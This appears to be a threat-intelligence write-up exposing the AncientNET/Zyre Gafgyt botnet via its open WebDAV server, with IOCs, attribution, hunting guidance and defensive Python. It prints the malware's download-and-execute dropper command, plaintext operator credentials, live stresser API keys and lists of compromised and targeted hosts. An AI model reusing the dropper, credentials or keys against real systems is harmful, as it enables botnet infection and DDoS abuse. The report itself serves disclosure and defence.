AncientNET / Zyre — Total Botnet Unmasking via an Open WebDAV
How a single open port turned a Gafgyt DDoS-as-a-Service operation inside out
TL;DR: A Vietnam-hosted Gafgyt-based DDoS-as-a-Service operation called AncientNET (bot family: Zyre / zyreBot) left an unauthenticated WebDAV server on port 4949 that exposes its entire C2 source code, operator credentials, SSH host keys, and live bot manifest. At time of writing the infrastructure is still fully online, the attack counter has incremented to 1,029 attacks against 252 active bots (up from 171 at investigation time — the operator is mass-onboarding bots right now), and the actor zyreeeee3 / BaconXD is identifiable down to a mail.ru address and Telegram channel. This is one of the cleanest DaaS operator unmaskings we've documented. Full IOCs at the bottom.
How we found it
A SecuriteInfoCom-tagged ARM ELF dropper was uploaded to VirusTotal on 2026-04-06 22:50:31 UTC (b7fb5a5d78431abfee0b69d44a8c0181df8dd588bca93694890aa8b0a3c75ab7). It was tagged Gafgyt by 18/76 engines but otherwise looked like routine IoT botnet noise. Three hours later GHOST flagged it for live infrastructure dumping. Within the same window we had the entire backend.
The tip is fresh — less than 24 hours old at the time of publication. The actor has not yet noticed.
The OPSEC failure
The C2 at 103.130.214.71 (BKHOST-VN, Hanoi, AS135953) runs six listening services:
| Port | Service | Purpose |
|---|---|---|
| 22 | OpenSSH 9.6p1 | System SSH |
| 1212 | HTTP | Payload distribution (zyre.<arch> binaries) |
| 1313 | HTTP | API endpoint |
| 2222 | libssh 0.10.6 | AncientNET operator panel |
| 4949 | WebDAV (HTTP) | Unauthenticated file server — directory listing on |
| 12345 | TCP | Bot listener |
Port 4949 returns a directory listing on GET / and serves every file inside the operator's working tree:
/
├── srv.c ← 233KB FULL C2 source (libssh + civetweb + json-c)
├── srv ← Compiled C2 binary (185 KB)
├── builder.sh ← 70KB cross-compile setup
├── build.sh ← Multi-arch build script
├── clients_cache.json ← LIVE BOT MANIFEST (175 entries with ASN/geo)
├── ssh_host_key{,_ecdsa} ← Server SSH PRIVATE KEYS
├── bot/ ← Bot client source
├── bins/, binss/ ← Compiled payloads (15 architectures)
├── database/
│ ├── creds.json ← 7 operator accounts in PLAINTEXT
│ ├── totalattacks.json ← Live attack counter
│ ├── config.json ← Slot allocation
│ ├── basic.json ← Stresser API integration (with API keys)
│ ├── rawmethods.json ← 16+ DDoS method definitions
│ └── spoofmethods.json ← IP-spoofed attack definitions
├── designs/ ← Terminal UI templates (.tfx)
├── funnel/ ← funnel attack module source
└── get files/ ← All DDoS tool source code (~20 files)
This is not a leak, a backup, or a snapshot. It is the operator's live working directory served over the public internet. Files modified during the investigation included clients_cache.json (auto-updated as bots checked in) and totalattacks.json (incrementing as attacks ran).
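As an added example (not the investigators' tooling and not anything from the exposed tree), the following Python sketches the pull described above: parse an index page for its entries, hash each fetched body, and diff two pulls so the files the operator is actively changing stand out. The index page and both pulls are constructed to mirror the tree on port 4949; the HTML shape of the listing is an assumption about how the server renders it, and the fetch itself is left to the reader.

```python
"""Snapshot an open directory listing and diff two pulls.

Added example, not code from AncientNET or from the investigators.
Assumes an Apache/civetweb-style index page with <a href="..."> entries;
the sample page and both pulls below are constructed.
"""
import hashlib
from html.parser import HTMLParser


class _LinkParser(HTMLParser):
    """Collect href values from an index page, skipping the parent-dir link
    and sort-order links ("?C=M;O=A" style)."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        href = dict(attrs).get("href")
        if href and not href.startswith(("?", "../", "/")):
            self.links.append(href)


def parse_listing(html):
    p = _LinkParser()
    p.feed(html)
    return p.links


def snapshot(files):
    """Map path -> SHA-256 of body. `files` stands in for fetched bodies."""
    return {path: hashlib.sha256(body).hexdigest() for path, body in files.items()}


def diff_snapshots(old, new):
    """Paths that appeared, vanished, or changed content between two pulls."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return {"added": added, "removed": removed, "changed": changed}


# Constructed index page, shaped like the tree served on port 4949.
INDEX_HTML = """<html><body><h1>Index of /</h1><pre>
<a href="?C=M;O=A">Last modified</a>
<a href="../">../</a>
<a href="srv.c">srv.c</a>
<a href="clients_cache.json">clients_cache.json</a>
<a href="database/">database/</a>
<a href="ssh_host_key">ssh_host_key</a>
</pre></body></html>"""

# Two constructed pulls a few minutes apart: the manifest grew, the counter
# moved, a new file appeared, the source did not change.
PULL_1 = {
    "clients_cache.json": b'[{"ip":"203.0.113.10","org":"ExampleHost"}]',
    "database/totalattacks.json": b'{"total":1018}',
    "srv.c": b"/* ... */",
}
PULL_2 = {
    "clients_cache.json": b'[{"ip":"203.0.113.10","org":"ExampleHost"},'
                          b'{"ip":"203.0.113.11","org":"ExampleHost"}]',
    "database/totalattacks.json": b'{"total":1029}',
    "srv.c": b"/* ... */",
    "database/creds.json": b"[]",
}


def example():
    return diff_snapshots(snapshot(PULL_1), snapshot(PULL_2))


if __name__ == "__main__":
    print(parse_listing(INDEX_HTML))
    print(example())
```

Polling this way is how the "files modified during the investigation" observation becomes evidence: a changed hash on clients_cache.json and totalattacks.json between two timestamped pulls is a record of live operation, not an inference.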
What we pulled
The C2 source code (srv.c, 238 KB)
Compiled with:
gcc -o srv srv.c -ljson-c -lcurl -lpthread -lcivetweb -lssh -lm
The server, branded "AncientNET" in its banner, runs an SSH-based operator panel via libssh on port 2222 (not OpenSSH — a custom service binding libssh directly), supports up to 100 concurrent operators and 1,000,000 bot connections, distributes payloads via an embedded civetweb HTTP server, and logs every attack to a hardcoded Discord webhook (Captain Hook, webhook ID 1482807215965339710). Attack slots are tiered: raw (1), funnel (3), mirai (4), spoof (1), with role-based access control across admin / vip / star / basic / mirai / raw / spoof.
C2 IP resolution is intentionally indirect: bots fetch the current operator IP from pastebin.com/raw/ifEadAbv (which still resolves to 103.130.214.71 as of right now). This is a textbook dead drop resolver — and it's tied to a single, identifiable Pastebin account.
The 7 operator accounts (creds.json)
Plaintext, exactly as the C2 reads them:
| Username | Password | Admin | Notes |
|---|---|---|---|
| admin | pwlaa1 | yes | All methods, 100 concurrent, 86,400s max attack |
| satyam | satyam006 | yes | vip / basic / star |
| enes | enesporn | yes | mirai (Turkish handle) |
| allah | Mina@2580 | no | mirai |
| symon | 4878398 | no | vip / basic / star |
| Keawee | keaweee | no | vip / basic / star |
| parker | parker1337 | no | vip / basic / star |
Every one of these is a credential pair you can pivot on across other DDoS forums and stresser sites.
The live bot manifest (clients_cache.json, 175 bots at the time of the pull)
171 active when we first pulled it; 175 by midday Apr 7 (see "Live status" below for the count at publication). The manifest is enriched with ASN, organization, and geo per bot. Top hosting providers compromised:
| Provider | Bot count |
|---|---|
| Hetzner Online GmbH | 24 |
| OVH SAS | 19 |
| Cloudflare, Inc. | 18 |
| Hetzner (other) | 10 |
| OVH GmbH | 7 |
| Oracle Corporation | 6 |
| Coritan LLC | 5 |
Geographic concentration is 44+ Germany (Saxony 30, Hesse 14), 21 Canada, 16 Netherlands, 14 Australia, 9 UK, 7 France, 6 Turkey. Pretty much exclusively VPS/cloud — almost no consumer IoT — which suggests the actor is brute-forcing exposed SSH on small VPS providers rather than running a Mirai-style telnet sweep.
Notable compromised endpoints flagged for notification:
| IP | Organization |
|---|---|
| 130.184.31.41 | University of Arkansas |
| 192.170.231.151 | University of Chicago |
| 155.133.246.50, 162.254.197.52, 185.25.182.50 | Valve Corporation (3 game-server IPs) |
| 20.195.24.81 | Microsoft Azure |
| 35.200.194.163 | Google Cloud |
| 145.40.87.131 | Equinix |
15 fresh payload variants
The binss/ directory holds 15 architecture-specific Zyre binaries — arm4 / arm5 / arm6 / arm7 / mips / mpsl / sh4 / spc / x86 / x64 / i486 / i686 / m68k / apk / dbg. We pulled eight ELF variants. All eight have zero VirusTotal detections. They were rebuilt the morning of the investigation.
The dropper logic is classic Gafgyt-derivative:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
(wget http://<C2>:1212/<payload> -O <name> ||
curl http://<C2>:1212/<payload> -o <name> ||
busybox wget http://<C2>:1212/<payload> -O <name>) >/dev/null 2>&1;
chmod +x <name>; ./<name> >/dev/null 2>&1 & rm -rf <name>
A single-instance lock on TCP/58210 is the cleanest hunting signature: a process holding a LISTEN socket on that port on a Linux box is almost certainly Zyre. Match on the listening bind, not on any socket that touches 58210; the port sits inside Linux's default ephemeral range (32768 to 60999), so ordinary outbound connections will occasionally pick it as a source port.
The bot also actively kills competing botnet processes: mirai. sora. bot. dark. hilix. rakitin. neon. owari. aqua. boatnet. mozi. — the standard "this device is mine" routine.
Attack methods
Three method classes are implemented:
Raw methods (local binaries): UDP flood (udpc), high-PPS UDP, Minecraft join flood (mcfucker), Roblox flood, generic TCP, OVH-bypass UDP, HTTP/HTTPS L7 flood (15K req batches), proxied L7, SYN, SYN-ACK, ACK, RST, TCP handshake flood, connection flood, Source Engine query flood (valve).
Spoofed methods (IP spoofing): sudp, ssyn, shand, sock.
API-based methods (relayed through commercial stressers): dns-star, tcp-star, ovh-star, http-star, socket, fivem, mc-socket, ssh, syn, tcpbypass — all routed through goofystress.st and webdown.su, with API keys hardcoded in database/basic.json:
goofystress.st: 9216f57fd2c15d2a4aa3cc2818d5d100946f68e727a5a5ab9ef6cdf72b3a8fc5
webdown.su: 02a163f83f9d3c52d51e56f90155472f54d17ace32632b7df596f1bf60e8df89
Both API keys are live abuse-report ammunition that the upstream stresser operators can use to identify and revoke this customer.
DDoS targets visible in the manifest
Several entries in clients_cache.json are clearly attack targets, not bots: they are hostnames or URLs rather than IP addresses, and they include competing booters:
- botrix.live, rivax.pro: competing stresser services
- dstat.femboybreeding.xyz: DDoS attack stats tracker
- kick.com: streaming platform
- getir.com: Turkish delivery app
- instagram.com: Meta
- equalpride.com, lgbt.foundation: LGBTQ+ media organizations
The presence of LGBTQ+ orgs in the target list is the most concerning data point — this is targeted, not opportunistic.
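The two observations above (the bot population is almost entirely VPS, and the manifest mixes in attack targets that are not bots) both fall out of one pass over the manifest. This is an added example, not the operation's code or the investigators' tooling: the field names (ip, org, country, region) are assumed, and the entries are constructed to resemble the manifest rather than copied from it.

```python
"""Triage a clients_cache.json-style manifest: separate real bots from the
entries that are actually attack targets, then aggregate bots by
organisation and country for the notification list.

Added example; field names and entries are assumed/constructed.
"""
import ipaddress
from collections import Counter

MANIFEST = [  # constructed sample, not the real manifest
    {"ip": "203.0.113.10", "org": "Hetzner Online GmbH", "country": "DE", "region": "Saxony"},
    {"ip": "203.0.113.11", "org": "Hetzner Online GmbH", "country": "DE", "region": "Saxony"},
    {"ip": "203.0.113.12", "org": "Hetzner Online GmbH", "country": "DE", "region": "Hesse"},
    {"ip": "198.51.100.5", "org": "OVH SAS", "country": "CA", "region": "Quebec"},
    {"ip": "198.51.100.6", "org": "OVH SAS", "country": "FR", "region": ""},
    {"ip": "192.0.2.77", "org": "Oracle Corporation", "country": "AU", "region": ""},
    {"ip": "rivax.pro", "org": "", "country": "", "region": ""},
    {"ip": "https://equalpride.com/", "org": "", "country": "", "region": ""},
]


def is_ip(value):
    """True for anything ipaddress accepts (v4 or v6); hostnames and URLs fail."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def split_manifest(entries):
    """Bots check in with a source address, so a well-formed IP means a bot.
    A hostname or URL in the same field is something the operator typed as
    an attack target, which is how the targets listed above surfaced."""
    bots = [e for e in entries if is_ip(e["ip"])]
    targets = [e["ip"] for e in entries if not is_ip(e["ip"])]
    return bots, targets


def aggregate(bots):
    """Counts by hosting organisation and by country."""
    return Counter(b["org"] for b in bots), Counter(b["country"] for b in bots)


def top_orgs(entries, n=3):
    bots, _ = split_manifest(entries)
    by_org, _ = aggregate(bots)
    return by_org.most_common(n)


if __name__ == "__main__":
    bots, targets = split_manifest(MANIFEST)
    print(len(bots), "bots; targets:", targets)
    print(top_orgs(MANIFEST))
```

The per-organisation counts are what drive abuse notifications; the target list is what turns an infrastructure report into a victim notification.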
Attribution
The exposed file system gives a near-complete identity chain on the primary operator:
| Handle | Platform | Evidence |
|---|---|---|
| zyreeeee3 | Pastebin | 9 public pastes since Sept 2025, hosts the C2 IP dead drop |
| BaconXD | Portmap.io | Secondary fallback C2 (BaconXD-57868.portmap.host:57868) |
| hedevis2000@mail.ru | mail.ru | WHOIS registrant for webdown.su (one of the integrated stressers) |
| ancientdownerr | Telegram | "Ancient Downer" channel, 24 members |
| Discord guild 1472532211604521020 | Discord | Attack-log webhook destination |
The C2 host's SSH key carries the hostname root@1031302147115430497564. We read that as an Oracle Cloud instance ID format, which would mean the actor either previously hosted on Oracle Cloud and migrated, or is using the BKHOST-VN box as a proxy in front of an Oracle origin. Treat that reading as tentative: the first eleven digits are the C2's own address with the dots removed (103.130.214.71 becomes 10313021471), which is equally consistent with a provider-generated hostname on the BKHOST-VN box itself.
A Pastebin paste tied to zyreeeee3 (/raw/30gV2uWt, dated 2026-01-29) lists three crypto wallets that are presumably tied to monetization:
ETH: 0xF04A19799E514aa654b26a0f73427Ce1d6768904
BTC: bc1qdqhnyjx0tcamk7mh0hwaf4xt48e59m2lerlm6c
TRON: TJNeEfK1DbUMyMThJye74bWKVt9bymXzQH
Live status as of publication
We rechecked the infrastructure immediately before publishing:
- All six C2 ports: still open
- Port 4949 WebDAV: still HTTP 200, still serving the entire working directory
- Pastebin dead drop: still resolves to 103.130.214.71
- Total attacks counter: 1,029 (was 1,018 at investigation time — 11 new attacks since)
- Active bots: 252 (was 171 at investigation time — net growth of 81 bots in less than 12 hours, with the bulk of growth in the final hour)
- creds.json: rewritten 11:10 UTC — operator was logged into their own panel mid-day
- builder.sh and srv.c: modified the morning of Apr 7 — actor is actively iterating
Translation: the operator does not know they have been observed and the investigation captured the operation mid-stride.
Why this matters
DDoS-as-a-Service operations are usually only partially mappable. You get the C2 IP, maybe a Telegram channel, sometimes a customer count from a Discord scrape. AncientNET is the rare case where a single OPSEC mistake — a directory listing left on — collapses the entire operation into a flat file pull. We have:
- The complete C2 source code (compilable)
- The credential database (plaintext, 7 operators)
- The SSH host private keys
- The current bot manifest with ASN-level enrichment
- The current attack-count counter
- The hardcoded stresser API keys (immediate revocation lever)
- The Pastebin / Telegram / Discord / mail.ru identity chain
- 8 fresh payload binaries with zero AV detection at publication
The defensive opportunities are immediate.
Recommendations
For network defenders:
- Block 103.130.214.71 at the perimeter, all ports.
- Block pastebin.com/raw/ifEadAbv, pastebin.com/raw/7vXQjepv (and the rest of the Pastebin URLs in the IOC table) at the proxy layer.
- Hunt for processes binding TCP/58210 on Linux — that's the Zyre single-instance lock and is unique enough to fire on its own.
- Hunt for processes named zyre, zyre2, zyreBot in /proc.
- Block outbound to goofystress.st and webdown.su.
- Sweep Linux VPS fleets for exposed/weak SSH — the bot population is overwhelmingly small VPS, not consumer IoT, so SSH brute force is the likely entry vector.
For platform abuse teams:
- Pastebin: kill account zyreeeee3 and remove the listed pastes (they are the C2 dead drop for an active botnet)
- Telegram: report t.me/ancientdownerr
- Discord: report guild 1472532211604521020 and webhook 1482807215965339710
- BKHOST-VN (hopqd@bkhost.vn, thanhtd@bkhost.vn): host 103.130.214.71 is an active C2 with exposed loot
- goofystress.st and webdown.su: revoke the listed API keys (they are funding a downstream operator who is reselling your service)
- mail.ru abuse: hedevis2000@mail.ru is the WHOIS registrant for webdown.su, a stresser wired into an active DaaS panel
For affected organizations (notification in progress):
- University of Arkansas IT Security (130.184.31.41)
- University of Chicago IT Security (192.170.231.151)
- Valve Security (3 IPs)
- equalpride.com / lgbt.foundation (your sites are on a target list)
IOCs
Primary C2
| Indicator | Type | Notes |
|---|---|---|
| 103.130.214.71 | IPv4 | C2 (BKHOST-VN, AS135953, Hanoi) |
| 103.130.214.71:12345 | TCP | Bot listener |
| 103.130.214.71:1212 | HTTP | Payload distribution |
| 103.130.214.71:2222 | TCP/libssh | Operator panel ("AncientNET") |
| 103.130.214.71:4949 | HTTP | Open WebDAV — complete directory listing |
| 103.130.214.71:1313 | HTTP | API endpoint |
| BaconXD-57868.portmap.host:57868 | Domain | Portmap.io fallback C2 |
| pastebin.com/raw/ifEadAbv | URL | C2 IP dead drop |
| pastebin.com/raw/7vXQjepv | URL | DDoS tool file list |
| pastebin.com/raw/xcrcEZq0 | URL | Java dropper source |
| pastebin.com/raw/euQsFVdL | URL | Proxy list |
| pastebin.com/raw/YBNKv3rM | URL | Go HTTP flooder |
| pastebin.com/raw/30gV2uWt | URL | Crypto wallet addresses |
| pastebin.com/raw/vsK91Srx | URL | Portmap fallback |
Stresser API infrastructure
| Domain | IP | Notes |
|---|---|---|
| goofystress.st | 104.26.13.141 (Cloudflare) | Created 2025-11-04 |
| webdown.su | 185.178.208.166 (DDoS-Guard) | Registrant hedevis2000@mail.ru |
| mirailovers.io | 104.21.81.246 (Cloudflare) | Cross-compiler host (Njalla privacy reg) |
Compromised stresser API keys
goofystress.st: 9216f57fd2c15d2a4aa3cc2818d5d100946f68e727a5a5ab9ef6cdf72b3a8fc5
webdown.su: 02a163f83f9d3c52d51e56f90155472f54d17ace32632b7df596f1bf60e8df89
File hashes — the original SecuriteInfoCom sample
| Algorithm | Hash |
|---|---|
| SHA256 | b7fb5a5d78431abfee0b69d44a8c0181df8dd588bca93694890aa8b0a3c75ab7 |
| SHA1 | ff446a26be1cbc1857b98024aa845b79d0464acc |
| MD5 | 8aadeaf8a3d4b3b21638b3dc511a078b |
File hashes — fresh payloads pulled from the C2 (0/76 VT at publication)
| File | SHA256 |
|---|---|
| zyre.arm4 | 802f78bcafbaccc3a920f2b4b2fed0f83c4023f0d2de0dc4cb53664101a53d05 |
| zyre.arm5 | db7a5fabfbcd71a90fe9df11e59c7c0bca398947fe5147790f08eaec425d5126 |
| zyre.arm6 | 1fcd2ba33df1f7d312877ccc38b3874e5b0af1a04531b73bc8657cfa85c0a4a2 |
| zyre.arm7 | 4d69b085e44791e13d7955ffdb1b16155041a919a6151ec521a6cf5fd7ecb5a7 |
| zyre.mips | b80f13e4dacd3ccc0f1a09b6d50699e9e1dcd69fca7205c09072d9b89e10009a |
| zyre.x86 | a206c528aa82627c1b19646cf368619ad8d550b712cb2e2fe005883ca6761d8b |
| zyre.sh4 | 86187dbf150d19fa3860c32744637283b1a308ace35d1e6e09495a3b981cfae4 |
| zyre.spc | 65412fae549a84301426b245ee48fe8e6a1a7c19d5f103375d5a9d668b51ab4c |
Hunting
- TCP/58210 bind on Linux (Zyre single-instance lock)
- Process names: zyre, zyre2, zyreBot
- File paths: /tmp/zyre.*, /var/run/zyre.*, /mnt/zyre.*, /root/zyre.*
- Outbound to 103.130.214.71 on any port
- DNS to goofystress.st, webdown.su, mirailovers.io
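The host-side items here and the TCP/58210 lock described under "15 fresh payload variants" combine into one check. The following Python is an added example, not the investigators' tooling: it parses `ss -ltnp` output for the lock port and walks a /proc-style process table for the listed names and drop paths. The `ss` output and the process table are constructed; on a live host substitute `subprocess.run(["ss", "-ltnp"], capture_output=True, text=True).stdout` (needs root to see process names) and a walk over /proc/<pid>/comm and readlink(/proc/<pid>/exe). The "(deleted)" check follows from the dropper shown earlier, which removes its own binary right after launching it, so the running process's exe link points at a file that no longer exists.

```python
"""Host hunt for Zyre: a LISTEN socket on TCP/58210 plus the process names
and drop paths listed on this page.

Added example; `ss` output and process table below are constructed, and
the exact `ss -ltnp` column layout is an assumption.
"""
import re

LOCK_PORT = 58210
PROCESS_NAMES = {"zyre", "zyre2", "zyreBot"}
DROP_DIRS = ("/tmp/", "/var/run/", "/mnt/", "/root/")

SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      1      127.0.0.1:58210    0.0.0.0:*         users:(("x86",pid=4417,fd=5))
LISTEN 0      511    *:80               *:*               users:(("nginx",pid=1204,fd=6))
"""  # constructed

# (pid, /proc/<pid>/comm, readlink /proc/<pid>/exe), constructed
PROC_TABLE = [
    (812, "sshd", "/usr/sbin/sshd"),
    (1204, "nginx", "/usr/sbin/nginx"),
    (4417, "x86", "/tmp/x86 (deleted)"),
    (4490, "zyreBot", "/var/run/zyre.arm7"),
]

SS_LINE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+"
    r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)'
)


def listeners(ss_text):
    """LISTEN sockets with their owning process, from `ss -ltnp` text."""
    out = []
    for line in ss_text.splitlines():
        m = SS_LINE.match(line)
        if m:
            out.append({"port": int(m["port"]), "name": m["name"], "pid": int(m["pid"])})
    return out


def lock_holders(ss_text, port=LOCK_PORT):
    """Only a listening bind counts: 58210 is inside the ephemeral range, so
    an established connection using it as a source port is not a signal."""
    return [l for l in listeners(ss_text) if l["port"] == port]


def suspicious_processes(proc_table):
    hits = []
    for pid, comm, exe in proc_table:
        reasons = []
        if comm in PROCESS_NAMES:
            reasons.append("name")
        in_drop_dir = exe.startswith(DROP_DIRS)
        if in_drop_dir and "zyre" in exe.rsplit("/", 1)[-1]:
            reasons.append("path")
        if in_drop_dir and exe.endswith(" (deleted)"):
            reasons.append("deleted-binary")  # dropper rm -rf's itself after exec
        if reasons:
            hits.append({"pid": pid, "comm": comm, "exe": exe, "reasons": reasons})
    return hits


def hunt(ss_text, proc_table):
    """Cross-reference the lock holder with the process table."""
    holders = lock_holders(ss_text)
    procs = suspicious_processes(proc_table)
    lock_pid = holders[0]["pid"] if holders else None
    return {"lock_pid": lock_pid, "suspects": [p["pid"] for p in procs],
            "lock_is_suspect": lock_pid in {p["pid"] for p in procs}}


if __name__ == "__main__":
    print(hunt(SS_OUTPUT, PROC_TABLE))
```

The sample shows why the lock port matters more than the name list: pid 4417 runs as "x86" (an architecture-named payload, as the binss/ directory suggests) and never matches a zyre* name, but it holds the lock and its binary is a deleted file in /tmp.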
Crypto wallets
ETH: 0xF04A19799E514aa654b26a0f73427Ce1d6768904
BTC: bc1qdqhnyjx0tcamk7mh0hwaf4xt48e59m2lerlm6c
TRON: TJNeEfK1DbUMyMThJye74bWKVt9bymXzQH
Investigation conducted 2026-04-07 by Breakglass Intelligence / GHOST. Original sample reported by SecuriteInfoCom on VirusTotal 2026-04-06 22:50 UTC. Infrastructure liveness reverified immediately before publication.